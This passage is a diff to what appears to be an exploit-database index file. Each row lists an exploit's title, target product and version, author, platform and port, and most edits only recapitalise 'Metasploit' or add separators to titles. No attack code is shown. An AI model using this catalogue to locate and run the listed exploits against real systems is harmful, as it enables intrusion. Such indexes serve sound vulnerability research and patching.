CSRF",2014-01-14,"Felipe Molina",hardware,webapps,80 -30915,platforms/hardware/remote/30915.rb,"SerComm Device - Remote Code Execution",2014-01-14,metasploit,hardware,remote,32764 +30915,platforms/hardware/remote/30915.rb,"SerComm Device - Remote Code Execution",2014-01-14,Metasploit,hardware,remote,32764 30916,platforms/php/webapps/30916.txt,"Burden 1.8 - Authentication Bypass",2014-01-14,"High-Tech Bridge SA",php,webapps,80 30917,platforms/php/webapps/30917.txt,"Horizon QCMS 4.0 - Multiple Vulnerabilities",2014-01-14,"High-Tech Bridge SA",php,webapps,80 30918,platforms/php/webapps/30918.txt,"iDevSpot iSupport 1.8 - 'index.php' Local File Include",2007-12-20,JuMp-Er,php,webapps,0 @@ -27898,10 +27898,10 @@ id,file,description,date,author,platform,type,port 31001,platforms/php/webapps/31001.txt,"IceWarp Mail Server 9.1.1 - 'admin/index.html' Cross-Site Scripting",2008-01-08,Ekin0x,php,webapps,0 31002,platforms/linux/dos/31002.txt,"xine-lib <= 1.1.9 - 'rmff_dump_cont()' Remote Heap Buffer Overflow",2008-01-09,"Luigi Auriemma",linux,dos,0 31003,platforms/php/webapps/31003.txt,"Omegasoft Insel 7 - Authentication Bypass and User Enumeration Weakness",2008-01-09,MC.Iglo,php,webapps,0 -31004,platforms/jsp/webapps/31004.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 /idm/login.jsp Multiple Parameter XSS",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 -31005,platforms/jsp/webapps/31005.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 /idm/account/findForSelect.jsp resultsForm Parameter XSS",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 -31006,platforms/jsp/webapps/31006.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 /idm/help/index.jsp helpUrl Variable Remote Frame Injection",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 -31007,platforms/jsp/webapps/31007.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 /idm/user/main.jsp activeControl Parameter XSS",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 +31004,platforms/jsp/webapps/31004.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - /idm/login.jsp Multiple Parameter XSS",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 +31005,platforms/jsp/webapps/31005.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - /idm/account/findForSelect.jsp resultsForm Parameter XSS",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 +31006,platforms/jsp/webapps/31006.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - /idm/help/index.jsp helpUrl Variable Remote Frame Injection",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 +31007,platforms/jsp/webapps/31007.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - /idm/user/main.jsp activeControl Parameter XSS",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 31008,platforms/php/webapps/31008.txt,"Joomla-SMF Forum 1.1.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-09,Doz,php,webapps,0 31009,platforms/php/webapps/31009.txt,"ID-Commerce 2.0 - 'liste.php' SQL Injection",2008-01-10,consultant.securite,php,webapps,0 31010,platforms/multiple/remote/31010.sql,"Oracle Database 10 g XML DB XDB.XDB_PITRIG_PKG Package PITRIG_TRUNCATE Function Overflow",2008-01-10,sh2kerr,multiple,remote,0 @@ -27999,7 +27999,7 @@ id,file,description,date,author,platform,type,port 31114,platforms/windows/dos/31114.txt,"Adobe Acrobat and Reader <= 8.1.1 - Multiple Arbitrary Code Execution and Security Vulnerabilities",2008-02-06,"Paul Craig",windows,dos,0 31115,platforms/php/webapps/31115.txt,"MyNews 1.6.x - 'hash' Parameter Cross-Site Scripting",2008-02-06,SkyOut,php,webapps,0 31116,platforms/php/webapps/31116.txt,"Pagetool 1.07 - 'search_term' Parameter Cross-Site Scripting",2008-02-06,Phanter-Root,php,webapps,0 -31117,platforms/asp/webapps/31117.txt,"WS_FTP Server 6 /WSFTPSVR/FTPLogServer/LogViewer.asp Authentication Bypass",2008-02-06,"Luigi Auriemma",asp,webapps,0 +31117,platforms/asp/webapps/31117.txt,"WS_FTP Server 6 - /WSFTPSVR/FTPLogServer/LogViewer.asp Authentication Bypass",2008-02-06,"Luigi Auriemma",asp,webapps,0 31118,platforms/windows/remote/31118.c,"Microsoft Works 8.0 File Converter Field Length Remote Code Execution",2008-02-06,"Luigi Auriemma",windows,remote,0 31119,platforms/multiple/remote/31119.txt,"TinTin++ and WinTin++ 1.97.9 - '#chat' Command Multiple Security Vulnerabilities",2008-02-06,"Luigi Auriemma",multiple,remote,0 31120,platforms/php/webapps/31120.txt,"MODx 0.9.6 index.php Multiple Parameter XSS",2008-02-07,"Alexandr Polyakov",php,webapps,0 @@ -28020,8 +28020,8 @@ id,file,description,date,author,platform,type,port 31135,platforms/php/webapps/31135.txt,"Rapid-Source Rapid-Recipe Component Multiple SQL Injection Vulnerabilities",2008-02-11,breaker_unit,php,webapps,0 31136,platforms/multiple/dos/31136.txt,"cyan soft Multiple Applications Format String and Denial of Service",2008-02-11,"Luigi Auriemma",multiple,dos,0 31137,platforms/php/webapps/31137.txt,"Joomla! and Mambo com_comments Component 0.5.8.5g 'id' Parameter SQL Injection",2008-02-11,CheebaHawk215,php,webapps,0 -31138,platforms/windows/dos/31138.txt,"Larson Network Print Server 9.4.2 build 105 (LstNPS) NPSpcSVR.exe License Command Remote Overflow",2008-02-11,"Luigi Auriemma",windows,dos,0 -31139,platforms/windows/dos/31139.txt,"Larson Network Print Server 9.4.2 build 105 (LstNPS) Logging Function USEP Command Remote Format String",2008-02-11,"Luigi Auriemma",windows,dos,0 +31138,platforms/windows/dos/31138.txt,"Larson Network Print Server 9.4.2 build 105 - (LstNPS) NPSpcSVR.exe License Command Remote Overflow",2008-02-11,"Luigi Auriemma",windows,dos,0 +31139,platforms/windows/dos/31139.txt,"Larson Network Print Server 9.4.2 build 105 - (LstNPS) Logging Function USEP Command Remote Format String",2008-02-11,"Luigi Auriemma",windows,dos,0 31140,platforms/php/webapps/31140.txt,"iTechClassifieds 3.03.057 - SQL Injection",2014-01-23,vinicius777,php,webapps,0 31141,platforms/php/webapps/31141.txt,"godontologico 5 - SQL Injection (0Day)",2014-01-23,vinicius777,php,webapps,0 31142,platforms/php/webapps/31142.txt,"Simple e-document 1.31 - Login bypass",2014-01-23,vinicius777,php,webapps,0 @@ -28065,7 +28065,7 @@ id,file,description,date,author,platform,type,port 31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode ActiveX (Data param) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 31179,platforms/windows/remote/31179.html,"Daum Game 1.1.0.5 - ActiveX (IconCreate Method) Stack Buffer Overflow",2014-01-24,"Trustwave's SpiderLabs",windows,remote,0 31180,platforms/hardware/webapps/31180.txt,"Franklin Fueling TS-550 evo 2.0.0.6833 - Multiple Vulnerabilities",2014-01-24,"Trustwave's SpiderLabs",hardware,webapps,10001 -31181,platforms/windows/remote/31181.rb,"HP Data Protector Backup Client Service - Directory Traversal",2014-01-24,metasploit,windows,remote,5555 +31181,platforms/windows/remote/31181.rb,"HP Data Protector Backup Client Service - Directory Traversal",2014-01-24,Metasploit,windows,remote,5555 31182,platforms/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",windows,local,0 31183,platforms/php/webapps/31183.txt,"SkyBlueCanvas CMS 1.1 r248-03 - Remote Command Execution",2014-01-24,"Scott Parish",php,webapps,80 31305,platforms/linux/dos/31305.c,"Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat Proof of Concept (1)",2014-01-31,"Kees Cook",linux,dos,0 @@ -28162,7 +28162,7 @@ id,file,description,date,author,platform,type,port 31261,platforms/hardware/webapps/31261.txt,"A10 Networks Loadbalancer - Directory Traversal",2014-01-29,xistence,hardware,webapps,443 31262,platforms/php/webapps/31262.txt,"ManageEngine Support Center Plus 7916 - Directory Traversal",2014-01-29,xistence,php,webapps,80 31263,platforms/php/webapps/31263.txt,"pfSense 2.1 build 20130911-1816 - Directory Traversal",2014-01-29,@u0x,php,webapps,0 -31264,platforms/php/remote/31264.rb,"Simple E-Document Arbitrary File Upload",2014-01-29,metasploit,php,remote,80 +31264,platforms/php/remote/31264.rb,"Simple E-Document Arbitrary File Upload",2014-01-29,Metasploit,php,remote,80 31275,platforms/asp/webapps/31275.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 Comments.asp FC Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",asp,webapps,0 31276,platforms/asp/webapps/31276.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 Labels.asp Term Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",asp,webapps,0 31277,platforms/php/webapps/31277.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 ClassList.asp Term Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",php,webapps,0 @@ -28308,9 +28308,9 @@ id,file,description,date,author,platform,type,port 31429,platforms/multiple/dos/31429.py,"VLC 2.1.2 - (.asf) Crash PoC",2014-02-05,Saif,multiple,dos,0 31430,platforms/hardware/webapps/31430.txt,"Inteno DG301 - Command Injection",2014-02-05,"Juan J. Guelfo",hardware,webapps,80 31431,platforms/php/webapps/31431.txt,"ImpressCMS 1.3.5 - Multiple Vulnerabilities",2014-02-05,"Pedro Ribeiro",php,webapps,80 -31432,platforms/linux/remote/31432.rb,"SkyBlueCanvas CMS - Remote Code Execution",2014-02-05,metasploit,linux,remote,0 -31433,platforms/multiple/remote/31433.rb,"Apache Tomcat Manager - Application Upload Authenticated Code Execution",2014-02-05,metasploit,multiple,remote,80 -31434,platforms/java/remote/31434.rb,"Apache Struts Developer Mode OGNL Execution",2014-02-05,metasploit,java,remote,8080 +31432,platforms/linux/remote/31432.rb,"SkyBlueCanvas CMS - Remote Code Execution",2014-02-05,Metasploit,linux,remote,0 +31433,platforms/multiple/remote/31433.rb,"Apache Tomcat Manager - Application Upload Authenticated Code Execution",2014-02-05,Metasploit,multiple,remote,80 +31434,platforms/java/remote/31434.rb,"Apache Struts Developer Mode OGNL Execution",2014-02-05,Metasploit,java,remote,8080 31435,platforms/php/webapps/31435.py,"Joomla JomSocial Component 2.6 - Code Execution Exploit",2014-02-05,"Matias Fontanini",php,webapps,80 31436,platforms/php/webapps/31436.txt,"Pandora Fms 5.0RC1 - Remote Command Injection",2014-02-05,xistence,php,webapps,80 31438,platforms/java/webapps/31438.txt,"IBM Rational ClearQuest 7.0 - Multiple Parameters Multiple Cross-Site Scripting Vulnerabilities",2008-03-19,sasquatch,java,webapps,0 @@ -28385,8 +28385,8 @@ id,file,description,date,author,platform,type,port 31515,platforms/php/webapps/31515.txt,"osCommerce 2.3.3.4 - (geo_zones.php zID param) SQL Injection",2014-02-07,"Ahmed Aboul-Ela",php,webapps,80 31516,platforms/php/webapps/31516.txt,"Serendipity 1.7.5 (Backend) - Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",php,webapps,80 31517,platforms/php/webapps/31517.txt,"CTERA 3.2.29.0 / 3.2.42.0 - Stored XSS",2014-02-07,"Luigi Vezzoso",php,webapps,80 -31518,platforms/linux/remote/31518.rb,"Pandora Fms - Remote Code Execution",2014-02-07,metasploit,linux,remote,8023 -31519,platforms/hardware/remote/31519.rb,"Android Browser and WebView addJavascriptInterface - Code Execution",2014-02-07,metasploit,hardware,remote,0 +31518,platforms/linux/remote/31518.rb,"Pandora Fms - Remote Code Execution",2014-02-07,Metasploit,linux,remote,8023 +31519,platforms/hardware/remote/31519.rb,"Android Browser and WebView addJavascriptInterface - Code Execution",2014-02-07,Metasploit,hardware,remote,0 31520,platforms/php/webapps/31520.txt,"AuraCMS 2.3 - Multiple Vulnerabilities",2014-02-07,"High-Tech Bridge SA",php,webapps,80 31521,platforms/php/webapps/31521.txt,"doorGets CMS 5.2 - SQL Injection",2014-02-07,"High-Tech Bridge SA",php,webapps,80 31522,platforms/windows/dos/31522.py,"OneHTTPD 0.8 - Crash PoC",2014-02-08,"Mahmod Mahajna (Mahy)",windows,dos,80 @@ -28438,9 +28438,9 @@ id,file,description,date,author,platform,type,port 32216,platforms/php/webapps/32216.txt,"RMSOFT Downloads Plus (rmdp) 1.5/1.7 Module for XOOPS down.php id Parameter XSS",2008-08-09,Lostmon,php,webapps,0 31573,platforms/ios/webapps/31573.txt,"WiFi Camera Roll 1.2 iOS - Multiple Vulnerabilities",2014-02-11,Vulnerability-Lab,ios,webapps,8880 31574,platforms/arm/local/31574.c,"Linux Kernel < 3.4.5 (ARM Android 4.2.2 / 4.4) - Local Root Exploit",2014-02-11,"Piotr Szerman",arm,local,0 -31575,platforms/windows/remote/31575.rb,"KingScada - kxClientDownload.ocx ActiveX Remote Code Execution",2014-02-11,metasploit,windows,remote,0 -31576,platforms/windows/local/31576.rb,"Windows TrackPopupMenuEx Win32k NULL Page",2014-02-11,metasploit,windows,local,0 -31577,platforms/unix/remote/31577.rb,"Kloxo - SQL Injection and Remote Code Execution",2014-02-11,metasploit,unix,remote,7778 +31575,platforms/windows/remote/31575.rb,"KingScada - kxClientDownload.ocx ActiveX Remote Code Execution",2014-02-11,Metasploit,windows,remote,0 +31576,platforms/windows/local/31576.rb,"Windows TrackPopupMenuEx Win32k NULL Page",2014-02-11,Metasploit,windows,local,0 +31577,platforms/unix/remote/31577.rb,"Kloxo - SQL Injection and Remote Code Execution",2014-02-11,Metasploit,unix,remote,7778 31578,platforms/windows/webapps/31578.txt,"Tableau Server - Blind SQL Injection",2014-02-11,"Trustwave's SpiderLabs",windows,webapps,80 31579,platforms/windows/webapps/31579.txt,"Titan FTP Server 10.32 Build 1816 - Directory Traversal",2014-02-11,"Fara Rustein",windows,webapps,0 31580,platforms/php/webapps/31580.txt,"Jax Guestbook 3.31/3.50 - 'jax_guestbook.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 @@ -28503,7 +28503,7 @@ id,file,description,date,author,platform,type,port 31639,platforms/php/webapps/31639.txt,"Trillian 3.1.9 - DTD File XML Parser Buffer Overflow",2008-04-11,david130490,php,webapps,0 31640,platforms/php/webapps/31640.txt,"osCommerce Poll Booth 2.0 AddOn - 'pollbooth.php' SQL Injection",2008-04-13,S@BUN,php,webapps,0 31641,platforms/java/webapps/31641.txt,"Business Objects Infoview - 'cms' Parameter Cross-Site Scripting",2008-04-14,"Sebastien gioria",java,webapps,0 -31643,platforms/windows/local/31643.rb,"Easy CD-DA Recorder - (PLS File) Buffer Overflow",2014-02-13,metasploit,windows,local,0 +31643,platforms/windows/local/31643.rb,"Easy CD-DA Recorder - (PLS File) Buffer Overflow",2014-02-13,Metasploit,windows,local,0 31644,platforms/asp/webapps/31644.txt,"Cezanne 6.5.1/7 - CFLookUP.asp Multiple Parameter XSS",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 31645,platforms/asp/webapps/31645.txt,"Cezanne 6.5.1/7 - CznCustomContainer.asp Multiple Parameter XSS",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 31646,platforms/asp/webapps/31646.txt,"Cezanne 6.5.1/7 - home.asp CFTARGET Parameter XSS",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 @@ -28544,7 +28544,7 @@ id,file,description,date,author,platform,type,port 31715,platforms/multiple/remote/31715.pl,"Castle Rock Computing SNMPc <= 7.0.19 - Community String Stack Based Buffer Overflow",2008-11-11,"raveen Darshanam",multiple,remote,0 31681,platforms/php/webapps/31681.py,"XOOPS 2.0.14 Article Module - 'article.php' SQL Injection",2008-04-21,Cr@zy_King,php,webapps,0 31682,platforms/php/webapps/31682.txt,"S9Y Serendipity 1.3 - Referer HTTP Header XSS",2008-04-22,"Hanno Boeck",php,webapps,0 -31917,platforms/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution",2014-02-26,metasploit,windows,remote,9090 +31917,platforms/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution",2014-02-26,Metasploit,windows,remote,9090 31686,platforms/multiple/webapps/31686.py,"Dexter (CasinoLoader) Panel - SQL Injection",2014-02-16,bwall,multiple,webapps,80 31688,platforms/windows/local/31688.pl,"ImageMagick 6.8.8-4 - Local Buffer Overflow (SEH)",2014-02-16,"Mike Czumak",windows,local,0 31689,platforms/windows/remote/31689.py,"HP Data Protector EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",windows,remote,5555 @@ -28553,7 +28553,7 @@ id,file,description,date,author,platform,type,port 31692,platforms/ios/webapps/31692.txt,"mbDriveHD 1.0.7 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,ios,webapps,8080 31693,platforms/ios/webapps/31693.txt,"File Hub 1.9.1 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,ios,webapps,8080 31694,platforms/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad EL Harmeel",windows,remote,0 -31695,platforms/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection",2014-02-16,metasploit,php,remote,0 +31695,platforms/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection",2014-02-16,Metasploit,php,remote,0 31702,platforms/php/webapps/31702.txt,"PHP-Nuke DownloadsPlus Module - Arbitrary File Upload",2008-04-24,ZoRLu,php,webapps,0 31703,platforms/php/webapps/31703.txt,"Pixel Motion Blog - 'list_article.php' Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps,0 31704,platforms/php/webapps/31704.txt,"PHCDownload 1.1 - admin/index.php hash Parameter SQL Injection",2008-04-24,ZoRLu,php,webapps,0 @@ -28588,7 +28588,7 @@ id,file,description,date,author,platform,type,port 31734,platforms/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",php,webapps,80 31735,platforms/php/webapps/31735.txt,"Concrete5 5.6.2.1 (index.php cID param) - SQL Injection",2014-02-18,killall-9,php,webapps,80 31736,platforms/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - POST Request Stack Buffer Overflow",2014-02-18,Sumit,windows,remote,80 -31737,platforms/windows/remote/31737.rb,"Oracle Forms and Reports - Remote Code Execution",2014-02-18,metasploit,windows,remote,0 +31737,platforms/windows/remote/31737.rb,"Oracle Forms and Reports - Remote Code Execution",2014-02-18,Metasploit,windows,remote,0 31738,platforms/php/webapps/31738.py,"Open Web Analytics 1.5.4 - (owa_email_address param) SQL Injection",2014-02-18,"Dana James Traversie",php,webapps,0 31739,platforms/php/webapps/31739.txt,"TLM CMS 1.1 - 'index.php' Multiple SQL Injection Vulnerabilities",2008-05-05,ZoRLu,php,webapps,0 31740,platforms/php/webapps/31740.html,"LifeType 1.2.8 - 'admin.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0 @@ -28617,8 +28617,8 @@ id,file,description,date,author,platform,type,port 31763,platforms/windows/dos/31763.py,"SolidWorks Workgroup PDM 2014 SP2 Opcode 2001 - Denial of Service",2014-02-19,"Mohamed Shetta",windows,dos,30000 31764,platforms/hardware/webapps/31764.txt,"Dlink DIR-615 Hardware vE4 Firmware v5.10 - CSRF",2014-02-19,"Dhruv Shah",hardware,webapps,80 31765,platforms/hardware/webapps/31765.txt,"Barracuda Message Archiver 650 - Persistent XSS",2014-02-19,Vulnerability-Lab,hardware,webapps,3378 -31766,platforms/windows/local/31766.rb,"Audiotran - (.PLS) Stack Buffer Overflow",2014-02-19,metasploit,windows,local,0 -31767,platforms/multiple/remote/31767.rb,"MediaWiki Thumb.php - Remote Command Execution",2014-02-19,metasploit,multiple,remote,80 +31766,platforms/windows/local/31766.rb,"Audiotran - (.PLS) Stack Buffer Overflow",2014-02-19,Metasploit,windows,local,0 +31767,platforms/multiple/remote/31767.rb,"MediaWiki Thumb.php - Remote Command Execution",2014-02-19,Metasploit,multiple,remote,80 31768,platforms/php/webapps/31768.txt,"WordPress BP Group Documents Plugin 1.2.1 - Multiple Vulnerabilities",2014-02-19,"Tom Adams",php,webapps,80 31769,platforms/windows/remote/31769.html,"Ourgame 'GLIEDown2.dll' ActiveX Control - Remote Code Execution",2008-05-08,anonymous,windows,remote,0 31770,platforms/multiple/remote/31770.txt,"Oracle Application Server Portal 10g - Authentication Bypass",2008-05-09,"Deniz Cevik",multiple,remote,0 @@ -28804,7 +28804,7 @@ id,file,description,date,author,platform,type,port 31952,platforms/php/webapps/31952.txt,"Chipmunk Blog archive.php membername Parameter XSS",2008-06-23,sl4xUz,php,webapps,0 31953,platforms/php/webapps/31953.txt,"Chipmunk Blog cat.php membername Parameter XSS",2008-06-23,sl4xUz,php,webapps,0 31954,platforms/php/webapps/31954.txt,"Benja CMS 0.1 - /admin/admin_edit_submenu.php URL XSS",2008-06-23,"CWH Underground",php,webapps,0 -31955,platforms/php/webapps/31955.txt,"Benja CMS 0.1 /admin/admin_new_submenu.php URL XSS",2008-06-23,"CWH Underground",php,webapps,0 +31955,platforms/php/webapps/31955.txt,"Benja CMS 0.1 - /admin/admin_new_submenu.php URL XSS",2008-06-23,"CWH Underground",php,webapps,0 31956,platforms/php/webapps/31956.txt,"Benja CMS 0.1 - /admin/admin_edit_topmenu.php URL XSS",2008-06-23,"CWH Underground",php,webapps,0 31957,platforms/multiple/dos/31957.txt,"World in Conflict 1.008 - NULL Pointer Remote Denial of Service",2008-06-23,"Luigi Auriemma",multiple,dos,0 31958,platforms/multiple/dos/31958.txt,"SunAge 1.8.1 - Multiple Denial of Service Vulnerabilities",2008-06-23,"Luigi Auriemma",multiple,dos,0 @@ -28839,8 +28839,8 @@ id,file,description,date,author,platform,type,port 32134,platforms/php/webapps/32134.txt,"H0tturk Panel 'gizli.php' Remote File Include",2008-07-31,U238,php,webapps,0 31983,platforms/multiple/webapps/31983.txt,"Plex Media Server 0.9.9.2.374-aa23a69 - Multiple Vulnerabilities",2014-02-28,"SEC Consult",multiple,webapps,32400 31986,platforms/php/webapps/31986.txt,"WordPress VideoWhisper 4.27.3 - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",php,webapps,80 -31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY gefebt.exe Remote Code Execution",2014-02-28,metasploit,windows,remote,80 -31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 - (Settings.ini) SEH Buffer Overflow (Metasploit)",2014-02-28,metasploit,windows,local,0 +31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY gefebt.exe Remote Code Execution",2014-02-28,Metasploit,windows,remote,80 +31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 - (Settings.ini) SEH Buffer Overflow (Metasploit)",2014-02-28,Metasploit,windows,local,0 31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 (SalesInquiry.php SortBy param) - SQL Injection",2014-02-28,HauntIT,php,webapps,80 31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation",2014-02-28,"Christian Catalano",multiple,webapps,0 31991,platforms/windows/local/31991.rb,"VCDGear 3.50 - (.cue) Stack Buffer Overflow Exploit",2014-02-28,Provensec,windows,local,0 @@ -28919,7 +28919,7 @@ id,file,description,date,author,platform,type,port 32069,platforms/php/webapps/32069.txt,"Claroline 1.8.9 wiki/wiki.php URL XSS",2008-07-15,"Digital Security Research Group",php,webapps,0 32070,platforms/php/webapps/32070.txt,"Claroline 1.8.9 work/work.php URL XSS",2008-07-15,"Digital Security Research Group",php,webapps,0 32071,platforms/php/webapps/32071.txt,"Claroline 1.8.9 claroline/redirector.php url Variable Arbitrary Site Redirect",2008-07-15,"Digital Security Research Group",php,webapps,0 -32074,platforms/windows/local/32074.rb,"ALLPlayer M3U Buffer Overflow",2014-03-05,metasploit,windows,local,0 +32074,platforms/windows/local/32074.rb,"ALLPlayer M3U Buffer Overflow",2014-03-05,Metasploit,windows,local,0 32075,platforms/php/webapps/32075.txt,"OpenDocMan 1.2.7 - Multiple Vulnerabilities",2014-03-05,"High-Tech Bridge SA",php,webapps,80 32076,platforms/php/webapps/32076.txt,"Ilch CMS 2.0 - Persistent XSS",2014-03-05,"High-Tech Bridge SA",php,webapps,80 32077,platforms/php/webapps/32077.txt,"IBS 0.15 - 'username' Parameter Cross-Site Scripting",2008-07-17,Cyb3r-1sT,php,webapps,0 @@ -28999,8 +28999,8 @@ id,file,description,date,author,platform,type,port 32158,platforms/windows/local/32158.txt,"iCAM Workstation Control 4.8.0.0 - Authentication Bypass",2014-03-10,StealthHydra,windows,local,0 32161,platforms/hardware/webapps/32161.txt,"Huawei E5331 MiFi Mobile Hotspot 21.344.11.00.414 - Multiple Vulnerabilities",2014-03-10,"SEC Consult",hardware,webapps,80 32162,platforms/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x (upload.php filename param) - Remote Code Execution",2014-03-10,Portcullis,multiple,webapps,80 -32163,platforms/windows/remote/32163.rb,"SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write",2014-03-10,metasploit,windows,remote,30000 -32164,platforms/windows/remote/32164.rb,"HP Data Protector Backup Client Service Remote Code Execution",2014-03-10,metasploit,windows,remote,5555 +32163,platforms/windows/remote/32163.rb,"SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write",2014-03-10,Metasploit,windows,remote,30000 +32164,platforms/windows/remote/32164.rb,"HP Data Protector Backup Client Service Remote Code Execution",2014-03-10,Metasploit,windows,remote,5555 32165,platforms/linux/remote/32165.txt,"XAMPP Linux 1.6 - ming.php text Parameter XSS",2008-08-04,"Khashayar Fereidani",linux,remote,0 32166,platforms/linux/remote/32166.txt,"XAMPP Linux 1.6 - iart.php text Parameter XSS",2008-08-04,"Khashayar Fereidani",linux,remote,0 32167,platforms/multiple/remote/32167.txt,"8E6 Technologies R3000 Host Header Internet Filter Security Bypass",2008-08-05,nnposter,multiple,remote,0 @@ -29045,8 +29045,8 @@ id,file,description,date,author,platform,type,port 32282,platforms/php/webapps/32282.txt,"Church Edit - Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0 32207,platforms/php/webapps/32207.txt,"GNUPanel 0.3.5_R4 - Multiple Vulnerabilities",2014-03-12,"Necmettin COSKUN",php,webapps,80 32208,platforms/multiple/dos/32208.txt,"Oracle VirtualBox 3D Acceleration - Multiple Vulnerabilities",2014-03-12,"Core Security",multiple,dos,0 -32209,platforms/windows/remote/32209.rb,"Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow",2014-03-12,metasploit,windows,remote,20171 -32210,platforms/windows/remote/32210.rb,"Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow",2014-03-12,metasploit,windows,remote,20111 +32209,platforms/windows/remote/32209.rb,"Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow",2014-03-12,Metasploit,windows,remote,20171 +32210,platforms/windows/remote/32210.rb,"Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow",2014-03-12,Metasploit,windows,remote,20111 32211,platforms/php/webapps/32211.txt,"LuxCal 3.2.2 - (CSRF/Blind SQL Injection) Multiple Vulnerabilities",2014-03-12,"TUNISIAN CYBER",php,webapps,80 32212,platforms/asp/webapps/32212.txt,"Procentia IntelliPen 1.1.12.1520 - data.aspx Blind SQL Injection",2014-03-12,Portcullis,asp,webapps,80 32213,platforms/php/webapps/32213.txt,"Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - (browse.php file param) Local File Inclusion",2014-03-12,Portcullis,php,webapps,80 @@ -29175,7 +29175,7 @@ id,file,description,date,author,platform,type,port 32354,platforms/php/webapps/32354.txt,"Horde 3.2 - MIME Attachment Filename Insufficient Filtering Cross-Site Scripting",2008-09-10,"Alexios Fakos",php,webapps,0 32355,platforms/php/webapps/32355.txt,"Hot Links SQL-PHP 'news.php' SQL Injection",2008-09-10,r45c4l,php,webapps,0 32356,platforms/windows/dos/32356.txt,"ZoneAlarm Security Suite 7.0 - AntiVirus Directory Path Buffer Overflow",2008-09-11,"Juan Pablo Lopez Yacubian",windows,dos,0 -32367,platforms/unix/remote/32367.rb,"Quantum vmPRO - Backdoor Command",2014-03-19,metasploit,unix,remote,22 +32367,platforms/unix/remote/32367.rb,"Quantum vmPRO - Backdoor Command",2014-03-19,Metasploit,unix,remote,22 32358,platforms/windows/local/32358.pl,"MP3Info 0.8.5a - SEH Buffer Overflow Exploit",2014-03-19,"Ayman Sagy",windows,local,0 32359,platforms/php/remote/32359.txt,"SePortal 2.5 - SQL Injection Vulnerabilty",2014-03-19,jsass,php,remote,0 32360,platforms/php/webapps/32360.txt,"Nooms 1.1 - smileys.php page_id Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0 @@ -29216,9 +29216,9 @@ id,file,description,date,author,platform,type,port 32434,platforms/php/webapps/32434.txt,"Recipe Script 'search.php' Cross-Site Scripting",2008-09-27,"Ghost Hacker",php,webapps,0 32435,platforms/windows/dos/32435.c,"Immunity Debugger 1.85 - Stack Overflow (PoC)",2014-03-22,"Veysel HATAS",windows,dos,0 32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE Vulnerabilities",2014-03-22,"Brandon Perry",php,webapps,0 -32438,platforms/windows/remote/32438.rb,"Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012)",2014-03-22,metasploit,windows,remote,0 -32439,platforms/php/remote/32439.rb,"Horde Framework Unserialize PHP Code Execution",2014-03-22,metasploit,php,remote,80 -32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privilege Escalation Code 